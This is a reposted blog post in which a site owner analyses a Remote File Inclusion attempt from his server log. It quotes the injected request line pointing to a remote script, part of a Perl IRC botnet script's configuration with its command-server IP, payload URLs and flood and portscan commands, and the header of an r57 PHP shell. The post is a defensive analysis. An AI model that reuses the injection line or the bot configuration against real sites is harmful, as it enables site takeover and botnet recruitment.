Another Remote File Inclusion attempt

From todays log:

/wpress/index2.php?mosConfig_absolute_path=http://[IP withheld]/.tmp/site/id3.txt??

The file(s) still exist on that server, so I have withheld the IP.
The following files are somehow being used in the attack:

  • id3.txt
  • scan3.txt
  • cmd.txt
  • spread.txt

The file id3.txt apparently tries to download the file scan3.txt from the same IP.
As my knowledge of perl and other scripting/programming languages are very close to zero I have no exact knowledge of what is going on. But I can guess.

scan3.txt

Some stuff from that file:
# % P1tbull Pwned your BoX %
Sounds scary.
But there is more:

# Hacke Bot Version 5.0 Private FiNAL
#
#You can use the following commands :
#!biatch @portscan
#!biatch @nmap
#!biatch @back #!biatch @udpflood

Sound even more scary.
It is a big file and most of does not tell me anything, but I mention some snippets:


######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '/usr/sbin/httpd';
######################
#####################################################################
#/!\ .:CONFIGURATION:. /!\#
#####################################################################
############################################
my $linas_max='10';
my $sleep='3';
#-----------------
#Sleep Time and Max. Lines for Anti Flood #
############################################
my $cmd="http://[IP of the same server the other files are on]/.tmp/site/cmd.txt?";
my $id="http://[IP of the same server the other files are on]/.tmp/site/id3.txt?";
my $spread="http://[IP of the same server the other files are on]/.tmp/site/spread.txt?";
#-----------------
#Spreader, ID=Response, CMD = Print CMD #
############################################
my @adms=("Fr0zen");
#----------------- #
#Admins of the Bot set your nickname here #
############################################
my @canais=("#r00ting");
#----------------- #
#Put your channel here #
############################################
my @nickname = ("r00t|1");
my $nick = $nickname[rand scalar @nickname];
my $ircname ='r00t-rfi';
chop (my $realname = 'we r0x');
#----------------- #
#Identity #
############################################
$servidor='67.43.131.27' unless $servidor;
my $porta='65500';
#----------------- #
#IRCServer and port #

And I keep guessing.
It tries to do something with files called “spread.txt” and “cmd.txt”.
And tries to connect to an irc server on 67.43.131.27 maybe too.
Wonder if that is what they call a Command and Control Center?
There is something alive there:

irc.Canada.B0tN3t.org :You have not registered

And then I get “(Ping timeout)”.
B0tN3t.org is registered to a Turkish guy “Ahmet Kafali”.

The file is too big to include here.
But it contains nasty words like “UDPFlood, HTTPFlood, TCPFlood, Mass Deface” to mention some.
Seems to contain a Mailer, Portscanner, LogCleaner and a search function to connect to major search engines to scan for vulnerable domains.
In addition it contains a link to a file on the Albanian Security Clan’s server.

spread.txt

Some kind of configuration file, I guess.
The same IP is mentioned as in “scan3.txt”, 67.43.131.27.
Contains some base64 decoded stuff.
Again, since my knowledge is close to zero, I am only guessing that this file takes care of the connection to the IRC server.

cmd.txt

I have seen that file before. On the Albanian Security Clans server. A PHP shell or something like that, maybe “r57shell.php”.

/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
/* ??????: 1.31
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
/* ?? rst@void.ru. ??? ??????????? ????? ???????????.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED

I guess that the content of that file will be easy to find if you really want it.

AntiVirus recognition

The “entrance” file id3.txt was only recognized by Authentium who calls it PHP/Small.B and ClamAV who calls it PHP.Downloader. Only a score of 2/32 on VirusTotal.com.

scan3.txt got a score of 7/31 on VirusTotal.com.
ClamAV recognizes it as Trojan.IRCBot-1142

The file spread.txt was not recognized by any vendors.

A bit better regarding the file cmd.txt which got a score of 11/32.
ClamAV calls this one PHP.Shell

I found one little piece of code in one of the files:
echo "AnakDompu
“;

Which apparently leads to some Indonesian guys.
So I am a bit in doubt about who these guys are; Albanians, Russians, Turks or Indonesians?
AnakDompu gives some hits to pages apparently related to hacking, e.g. http://shinchi.wordpress.com/ , http://samada.wordpress.com/ , http://anakdompu.blogspot.com/ and http://anakdompu.wordpress.com/. And irc-channels on IndoIRC and DALnet.
l33t scriptkiddies who ruin other sites for fun? I think those days are over and most attacks nowadays are economically motivated.

It’s a dangerous world.


source : http://matchent.com/wpress/?p=280


Another Remote File Inclusion attempt Another Remote File Inclusion attempt Reviewed by Furkan Samadha on 6:46 AM Rating: 5